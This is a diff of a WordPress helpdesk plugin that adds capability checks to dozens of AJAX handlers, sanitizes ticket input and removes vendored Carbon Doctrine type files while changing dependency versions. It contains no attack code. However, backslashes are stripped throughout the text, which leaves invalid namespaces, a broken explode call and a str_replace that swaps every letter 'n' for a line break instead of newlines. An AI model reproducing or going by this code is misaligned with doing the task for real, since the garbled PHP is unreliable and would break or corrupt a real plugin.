 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
+			if (!current_user_can('administrator') && !current_user_can('agents_page')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+			}
 			$current_user = wp_get_current_user();
 			$user_roles = $current_user->roles;

@@ -1545,6 +1551,9 @@
 	public static function eh_crm_ticket_single_save_props()
 	{
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
+			if (!current_user_can('administrator') && !current_user_can('manage_tickets')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+			}
 			$ticket_id = isset($_POST['ticket_id']) ? sanitize_text_field($_POST['ticket_id']) : null;
 			$assignee = ((isset($_POST['assignee']) ? sanitize_text_field($_POST['assignee']) : null !== '') ? explode(',', sanitize_text_field($_POST['assignee'])) : array());
 			$tags = ((isset($_POST['tags']) ? sanitize_text_field($_POST['tags']) : null !== '') ? explode(',', isset($_POST['tags']) ? sanitize_text_field($_POST['tags']) : null) : array());
@@ -1582,6 +1591,9 @@
 	public static function eh_crm_ticket_single_delete()
 	{
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
+			if (!current_user_can('administrator') && !current_user_can('delete_tickets')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+			}
 			$ticket_id = isset($_POST['ticket_id']) ? sanitize_text_field($_POST['ticket_id']) : '';
 			$child = eh_crm_get_ticket_value_count('ticket_parent', $ticket_id);
 			for ($i = 0; $i < count($child); $i++) {
@@ -1595,6 +1607,9 @@
 	{

 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
+			if (!current_user_can('administrator') && !current_user_can('delete_tickets')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+			}
 			$repo = new WSDeskTicketsTicketRepository();
 			$filters = $_POST;
 			if (isset($_post['tickets_id'])) {
@@ -1622,12 +1637,8 @@
 	public static function eh_crm_settings_empty_scheduled_actions()
 	{
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
-
-			$current_user = wp_get_current_user();
-			$user_roles = $current_user->roles;
-
-			if (!in_array('administrator', $user_roles, true) && !in_array('WSDesk_Supervisor', $user_roles, true)) {
-				wp_send_json_error(array('message' => 'Unauthorized User.'), 403);
+			if (!current_user_can('administrator') && !current_user_can('settings_page')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
 			}
 			delete_option('wsdesk_scheduled_triggers', '');
 			die(json_encode(array('result' => 'success')));
@@ -1638,11 +1649,8 @@
 	{
 		set_time_limit(300);
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
-			$current_user = wp_get_current_user();
-			$user_roles = $current_user->roles;
-
-			if (!in_array('administrator', $user_roles, true) && !in_array('WSDesk_Supervisor', $user_roles, true)) {
-				wp_send_json_error(array('message' => 'Unauthorized User.'), 403);
+			if (!current_user_can('administrator') && !current_user_can('delete_tickets')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
 			}
 			global $wpdb;
 			$table = $wpdb->prefix . 'wsdesk_tickets';
@@ -1675,11 +1683,8 @@
 	{
 		set_time_limit(300);
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
-			$current_user = wp_get_current_user();
-			$user_roles = $current_user->roles;
-
-			if (!in_array('administrator', $user_roles, true) && !in_array('WSDesk_Supervisor', $user_roles, true)) {
-				wp_send_json_error(array('message' => 'Unauthorized User.'), 403);
+			if (!current_user_can('administrator') && !current_user_can('delete_tickets')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
 			}
 			global $wpdb;
 			$table = $wpdb->prefix . 'wsdesk_tickets';
@@ -1711,6 +1716,9 @@
 	public static function eh_crm_export_ticket_data()
 	{
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
+			if (!current_user_can('administrator') && !current_user_can('import_page')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+			}
 			$start_date = date_create(isset($_POST['export_start_date']) ? sanitize_text_field($_POST['export_start_date']) : null);
 			$end_date = date_create(isset($_POST['export_end_date']) ? sanitize_text_field($_POST['export_end_date']) : null);
 			if (!$end_date) {
--- a/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions.php
+++ b/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions.php
@@ -668,6 +668,9 @@

 	public static function eh_crm_activate_oauth() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$client_id     = isset( $_POST['client_id'] ) ? sanitize_text_field( $_POST['client_id'] ) : null;
 			$client_secret = isset( $_POST['client_secret'] ) ? sanitize_text_field( $_POST['client_secret'] ) : null;
 			eh_crm_update_settingsmeta( 0, 'oauth_client_id', $client_id );
@@ -679,6 +682,9 @@
 	}

 	public static function eh_crm_deactivate_oauth() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$oauth_obj = new EH_CRM_OAuth();
 		$oauth_obj->revoke_token();

@@ -692,6 +698,9 @@

 	public static function eh_crm_activate_email_protocol() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$server_url   = isset( $_POST['server_url'] ) ? sanitize_text_field( $_POST['server_url'] ) : null;
 			$server_port  = isset( $_POST['server_port'] ) ? sanitize_text_field( $_POST['server_port'] ) : null;
 			$email        = isset( $_POST['email'] ) ? sanitize_text_field( $_POST['email'] ) : null;
@@ -791,6 +800,9 @@

 	public static function eh_crm_deactivate_email_protocol() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$id = isset( $_POST['id'] ) ? sanitize_text_field( $_POST['id'] ) : null;
 			if ( $id ) {
 				$imap_account_data = array_values( eh_crm_get_settingsmeta( '0', 'imap_account_data' ) );
@@ -806,6 +818,9 @@

 	public static function eh_crm_email_block_filter() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$new_block = json_decode( stripslashes( isset( $_POST['new_block'] ) ? sanitize_text_field( $_POST['new_block'] ) : null ), true );
 			if ( ! empty( $new_block ) ) {

@@ -835,6 +850,9 @@

 	public static function eh_crm_subject_block_filter() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$new_block = json_decode( stripslashes( isset( $_POST['new_block'] ) ? sanitize_text_field( $_POST['new_block'] ) : null ), true );
 			if ( ! empty( $new_block ) ) {

@@ -864,6 +882,9 @@

 	public static function eh_crm_email_block_delete() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$block_remove = isset( $_POST['block_remove'] ) ? sanitize_text_field( $_POST['block_remove'] ) : null;
 			$block_filter = eh_crm_get_settingsmeta( '0', 'email_block_filters' );
 			if ( ! $block_filter ) {
@@ -884,6 +905,9 @@

 	public static function eh_crm_subject_block_delete() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$block_remove = isset( $_POST['block_remove'] ) ? sanitize_text_field( $_POST['block_remove'] ) : null;
 			$block_filter = eh_crm_get_settingsmeta( '0', 'subject_block_filters' );
 			if ( ! $block_filter ) {
@@ -1280,6 +1304,9 @@

 	public static function eh_crm_email_support_save() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$support_email_name    = isset( $_POST['support_email_name'] ) ? sanitize_text_field( $_POST['support_email_name'] ) : null;
 			$support_email         = isset( $_POST['support_email'] ) ? sanitize_text_field( $_POST['support_email'] ) : null;
 			$new_ticket_text       = isset( $_POST['new_ticket_text'] ) ? wp_kses_post( $_POST['new_ticket_text'] ) : null;
@@ -1298,6 +1325,9 @@

 	public static function eh_crm_backup_data() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			require_once EH_CRM_MAIN_PATH . 'includes/class-crm-backup-restore.php';
 			$post  = $_POST;
 			$start = isset( $_POST['backup_date_range_start'] ) ? sanitize_text_field( $_POST['backup_date_range_start'] ) : null;
@@ -1310,11 +1340,8 @@

 	public static function eh_crm_restore_data() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-			$current_user = wp_get_current_user();
-			$user_roles   = $current_user->roles;
-
-			if ( ! in_array( 'administrator', $user_roles, true ) && ! in_array( 'WSDesk_Supervisor', $user_roles, true ) ) {
-				wp_send_json_error( array( 'message' => 'Unauthorized User.' ), 403 );
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
 			}
 			require_once EH_CRM_MAIN_PATH . 'includes/class-crm-backup-restore.php';
 			if ( isset( $_FILES['file'] ) && ! empty( $_FILES['file'] ) ) {
@@ -1330,6 +1357,9 @@

 	public static function eh_crm_zendesk_save_data() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$token     = isset( $_POST['token'] ) ? sanitize_text_field( $_POST['token'] ) : null;
 			$subdomain = isset( $_POST['subdomain'] ) ? sanitize_text_field( $_POST['subdomain'] ) : null;
 			$username  = isset( $_POST['username'] ) ? sanitize_text_field( $_POST['username'] ) : null;
@@ -1342,6 +1372,9 @@

 	public static function eh_crm_zendesk_pull_tickets() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			eh_crm_update_settingsmeta( 0, 'zendesk_tickets_import', 'started' );
 			eh_crm_write_log( '' );
 			$page       = isset( $_POST['page'] ) ? sanitize_text_field( $_POST['page'] ) : null
@@ -1374,6 +1407,9 @@

 	public static function eh_crm_live_log() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			if ( isset( $_GET['action'] ) ) {
 				if ( ! session_id() ) {
 					session_start();
@@ -1403,8 +1439,13 @@
 	}

 	public static function eh_crm_zendesk_stop_pull_tickets() {
-		eh_crm_update_settingsmeta( 0, 'zendesk_tickets_import', 'stopped' );
-		die();
+		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
+			eh_crm_update_settingsmeta( 0, 'zendesk_tickets_import', 'stopped' );
+			die();
+		}
 	}

 	public static function eh_crm_woo_report_products() {
@@ -1425,6 +1466,9 @@

 	public static function eh_crm_ticket_new_template() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_templates' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$title            = stripslashes( isset( $_POST['title'] ) ? sanitize_text_field( $_POST['title'] ) : null );
 			$content          = stripslashes( isset( $_POST['content'] ) ? wp_kses_post( $_POST['content'] ) : null );
 			$insert           = array(
@@ -1468,6 +1512,9 @@

 	public static function eh_crm_ticket_update_template() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_templates' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$slug    = stripslashes( isset( $_POST['slug'] ) ? sanitize_text_field( $_POST['slug'] ) : null );
 			$title   = stripslashes( isset( $_POST['title'] ) ? sanitize_text_field( $_POST['title'] ) : null );
 			$content = stripslashes( isset( $_POST['content'] ) ? wp_kses_post( $_POST['content'] ) : null );
@@ -1480,6 +1527,9 @@

 	public static function eh_crm_ticket_template_delete() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_templates' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$slug = isset( $_POST['slug'] ) ? sanitize_text_field( $_POST['slug'] ) : null;
 			$temp = eh_crm_get_settings( array( 'slug' => $slug ) );
 			eh_crm_delete_settings( $temp[0]['settings_id'] );
@@ -1509,6 +1559,9 @@
 	}
 	public static function eh_crm_ticket_template_search() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_templates' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$text = isset( $_POST['text'] ) ? sanitize_text_field( $_POST['text'] ) : '';
 			set_time_limit( 300 );
 			global $wpdb;
@@ -1548,6 +1601,9 @@

 	public static function eh_crm_ticket_edit_template_content() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_templates' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 		$slug         = isset( $_POST['slug'] ) ? sanitize_text_field( $_POST['slug'] ) : null;
 		$temp         = eh_crm_get_settings( array( 'slug' => $slug ) );
 		$temp_meta    = eh_crm_get_settingsmeta( $temp[0]['settings_id'] );
@@ -1878,8 +1934,8 @@
 			$files_values = $_FILES;
 			$files        = isset( $files_values['file'] ) ? $files_values['file'] : '';
 			$email        = $post_values['request_email'];
-			$title        = stripslashes( $post_values['request_title'] );
-			$desc         = str_replace( "n", '<br/>', stripslashes( $post_values['request_description'] ) );
+			$title        = sanitize_text_field( stripslashes( $post_values['request_title'] ) );
+			$desc         = wp_kses_post( str_replace( "n", '<br/>', stripslashes( $post_values['request_description'] ) ) );
 			$vendor       = '';
 		if ( EH_CRM_WOO_STATUS ) {
 			if ( isset( $post_values['woo_vendors'] ) ) {
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonDoctrineType.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonDoctrineType.php
@@ -1,14 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-use DoctrineDBALPlatformsAbstractPlatform;
-
-interface CarbonDoctrineType
-{
-    public function getSQLDeclaration(array $fieldDeclaration, AbstractPlatform $platform);
-
-    public function convertToPHPValue($value, AbstractPlatform $platform);
-
-    public function convertToDatabaseValue($value, AbstractPlatform $platform);
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonImmutableType.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonImmutableType.php
@@ -1,7 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-class CarbonImmutableType extends DateTimeImmutableType implements CarbonDoctrineType
-{
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonType.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonType.php
@@ -1,7 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-class CarbonType extends DateTimeType implements CarbonDoctrineType
-{
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonTypeConverter.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonTypeConverter.php
@@ -1,141 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-use CarbonCarbon;
-use CarbonCarbonInterface;
-use DateTimeInterface;
-use DoctrineDBALPlatformsAbstractPlatform;
-use DoctrineDBALPlatformsDB2Platform;
-use DoctrineDBALPlatformsOraclePlatform;
-use DoctrineDBALPlatformsSqlitePlatform;
-use DoctrineDBALPlatformsSQLServerPlatform;
-use DoctrineDBALTypesConversionException;
-use Exception;
-
-/**
- * @template T of CarbonInterface
- */
-trait CarbonTypeConverter
-{
-    /**
-     * This property differentiates types installed by carbonphp/carbon-doctrine-types
-     * from the ones embedded previously in nesbot/carbon source directly.
-     *
-     * @readonly
-     */
-    public bool $external = true;
-
-    /**
-     * @return class-string<T>
-     */
-    protected function getCarbonClassName(): string
-    {
-        return Carbon::class;
-    }
-
-    public function getSQLDeclaration(array $fieldDeclaration, AbstractPlatform $platform): string
-    {
-        $precision = min(
-            $fieldDeclaration['precision'] ?? DateTimeDefaultPrecision::get(),
-            $this->getMaximumPrecision($platform),
-        );
-
-        $type = parent::getSQLDeclaration($fieldDeclaration, $platform);
-
-        if (!$precision) {
-            return $type;
-        }
-
-        if (str_contains($type, '(')) {
-            return preg_replace('/(d+)/', "($precision)", $type);
-        }
-
-        [$before, $after] = explode(' ', "$type ");
-
-        return trim("$before($precision) $after");
-    }
-
-    /**
-     * @SuppressWarnings(PHPMD.UnusedFormalParameter)
-     *
-     * @return T|null
-     */
-    public function convertToPHPValue($value, AbstractPlatform $platform)
-    {
-        $class = $this->getCarbonClassName();
-
-        if ($value === null || is_a($value, $class)) {
-            return $value;
-        }
-
-        if ($value instanceof DateTimeInterface) {
-            return $class::instance($value);
-        }
-
-        $date = null;
-        $error = null;
-
-        try {
-            $date = $class::parse($value);
-        } catch (Exception $exception) {
-            $error = $exception;
-        }
-
-        if (!$date) {
-            throw ConversionException::conversionFailedFormat(
-                $value,
-                $this->getTypeName(),
-                'Y-m-d H:i:s.u or any format supported by '.$class.'::parse()',
-                $error
-            );
-        }
-
-        return $date;
-    }
-
-    /**
-     * @SuppressWarnings(PHPMD.UnusedFormalParameter)
-     */
-    public function convertToDatabaseValue($value, AbstractPlatform $platform): ?string
-    {
-        if ($value === null) {
-            return $value;
-        }
-
-        if ($value instanceof DateTimeInterface) {
-            return $value->format('Y-m-d H:i:s.u');
-        }
-
-        throw ConversionException::conversionFailedInvalidType(
-            $value,
-            $this->getTypeName(),
-            ['null', 'DateTime', 'Carbon']
-        );
-    }
-
-    private function getTypeName(): string
-    {
-        $chunks = explode('\', static::class);
-        $type = preg_replace('/Type$/', '', end($chunks));
-
-        return strtolower(preg_replace('/([a-z])([A-Z])/', '$1_$2', $type));
-    }
-
-    private function getMaximumPrecision(AbstractPlatform $platform): int
-    {
-        if ($platform instanceof DB2Platform) {
-            return 12;
-        }
-
-        if ($platform instanceof OraclePlatform) {
-            return 9;
-        }
-
-        if ($platform instanceof SQLServerPlatform || $platform instanceof SqlitePlatform) {
-            return 3;
-        }
-
-        return 6;
-    }
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeDefaultPrecision.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeDefaultPrecision.php
@@ -1,28 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-class DateTimeDefaultPrecision
-{
-    private static $precision = 6;
-
-    /**
-     * Change the default Doctrine datetime and datetime_immutable precision.
-     *
-     * @param int $precision
-     */
-    public static function set(int $precision): void
-    {
-        self::$precision = $precision;
-    }
-
-    /**
-     * Get the default Doctrine datetime and datetime_immutable precision.
-     *
-     * @return int
-     */
-    public static function get(): int
-    {
-        return self::$precision;
-    }
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeImmutableType.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeImmutableType.php
@@ -1,20 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-use CarbonCarbonImmutable;
-use DoctrineDBALTypesVarDateTimeImmutableType;
-
-class DateTimeImmutableType extends VarDateTimeImmutableType implements CarbonDoctrineType
-{
-    /** @use CarbonTypeConverter<CarbonImmutable> */
-    use CarbonTypeConverter;
-
-    /**
-     * @return class-string<CarbonImmutable>
-     */
-    protected function getCarbonClassName(): string
-    {
-        return CarbonImmutable::class;
-    }
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeType.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeType.php
@@ -1,12 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-use CarbonCarbon;
-use DoctrineDBALTypesVarDateTimeType;
-
-class DateTimeType extends VarDateTimeType implements CarbonDoctrineType
-{
-    /** @use CarbonTypeConverter<Carbon> */
-    use CarbonTypeConverter;
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/composer/autoload_psr4.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/composer/autoload_psr4.php
@@ -15,13 +15,11 @@
     'Psr\Http\Message\' => array($vendorDir . '/psr/http-factory/src', $vendorDir . '/psr/http-message/src'),
     'Psr\Http\Client\' => array($vendorDir . '/psr/http-client/src'),
     'Psr\Container\' => array($vendorDir . '/psr/container/src'),
-    'Psr\Clock\' => array($vendorDir . '/psr/clock/src'),
     'Illuminate\Support\' => array($vendorDir . '/illuminate/support', $vendorDir . '/illuminate/collections', $vendorDir . '/illuminate/macroable'),
     'Illuminate\Contracts\' => array($vendorDir . '/illuminate/contracts'),
     'GuzzleHttp\Psr7\' => array($vendorDir . '/guzzlehttp/psr7/src'),
     'GuzzleHttp\Promise\' => array($vendorDir . '/guzzlehttp/promises/src'),
     'GuzzleHttp\' => array($vendorDir . '/guzzlehttp/guzzle/src'),
-    'Doctrine\Inflector\' => array($vendorDir . '/doctrine/inflector/src'),
-    'Carbon\Doctrine\' => array($vendorDir . '/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine'),
+    'Doctrine\Inflector\' => array($vendorDir . '/doctrine/inflector/lib/Doctrine/Inflector'),
     'Carbon\' => array($vendorDir . '/nesbot/carbon/src/Carbon'),
 );
--- a/elex-helpdesk-customer-support-ticket-system/vendor/composer/autoload_static.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/composer/autoload_static.php
@@ -38,7 +38,6 @@
             'Psr\Http\Message\' => 17,
             'Psr\Http\Client\' => 16,
             'Psr\Container\' => 14,
-            'Psr\Clock\' => 10,
         ),
         'I' =>
         array (
@@ -57,7 +56,6 @@
         ),
         'C' =>
         array (
-            'Carbon\Doctrine\' => 16,
             'Carbon\' => 7,
         ),
     );
@@ -100,10 +98,6 @@
         array (
             0 => __DIR__ . '/..' . '/psr/container/src',
         ),
-        'Psr\Clock\' =>
-        array (
-            0 => __DIR__ . '/..' . '/psr/clock/src',
-        ),
         'Illuminate\Support\' =>
         array (
             0 => __DIR__ . '/..' . '/illuminate/support',
@@ -128,11 +122,7 @@
         ),
         'Doctrine\Inflector\' =>
         array (
-            0 => __DIR__ . '/..' . '/doctrine/inflector/src',
-        ),
-        'Carbon\Doctrine\' =>
-        array (
-            0 => __DIR__ . '/..' . '/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine',
+            0 => __DIR__ . '/..' . '/doctrine/inflector/lib/Doctrine/Inflector',
         ),
         'Carbon\' =>
         array (
--- a/elex-helpdesk-customer-support-ticket-system/vendor/composer/installed.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/composer/installed.php
@@ -7,22 +7,13 @@
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
-        'dev' => true,
+        'dev' => false,
     ),
     'versions' => array(
-        'carbonphp/carbon-doctrine-types' => array(
-            'pretty_version' => '2.1.0',
-            'version' => '2.1.0.0',
-            'reference' => '99f76ffa36cce3b70a4a6abce41dba15ca2e84cb',
-            'type' => 'library',
-            'install_path' => __DIR__ . '/../carbonphp/carbon-doctrine-types',
-            'aliases' => array(),
-            'dev_requirement' => false,
-        ),
         'doctrine/inflector' => array(
-            'pretty_version' => '2.1.0',
-            'version' => '2.1.0.0',
-            'reference' => '6d6c96277ea252fc1304627204c3d5e6e15faa3b',
+            'pretty_version' => '2.0.8',
+            'version' => '2.0.8.0',
+            'reference' => 'f9301a5b2fb1216b2b08f02ba04dc45423db6bff',
             'type' => 'library',
             'install_path' => __DIR__ . '/../doctrine/inflector',
             'aliases' => array(),
@@ -38,27 +29,27 @@
             'dev_requirement' => false,
         ),
         'guzzlehttp/guzzle' => array(
-            'pretty_version' => '7.10.0',
-            'version' => '7.10.0.0',
-            'reference' => 'b51ac707cfa420b7bfd4e4d5e510ba8008e822b4',
+            'pretty_version' => '7.7.0',
+            'version' => '7.7.0.0',
+            'reference' => 'fb7566caccf22d74d1ab270de3551f72a58399f5',
             'type' => 'library',
             'install_path' => __DIR__ . '/../guzzlehttp/guzzle',
             'aliases' => array(),
             'dev_requirement' => false,
         ),
         'guzzlehttp/promises' => array(
-            'pretty_version' => '2.3.0',
-            'version' => '2.3.0.0',
-            'reference' => '481557b130ef3790cf82b713667b43030dc9c957',
+            'pretty_version' => '2.0.1',
+            'version' => '2.0.1.0',
+            'reference' => '111166291a0f8130081195ac4556a5587d7f1b5d',
             'type' => 'library',
             'install_path' => __DIR__ . '/../guzzlehttp/promises',
             'aliases' => array(),
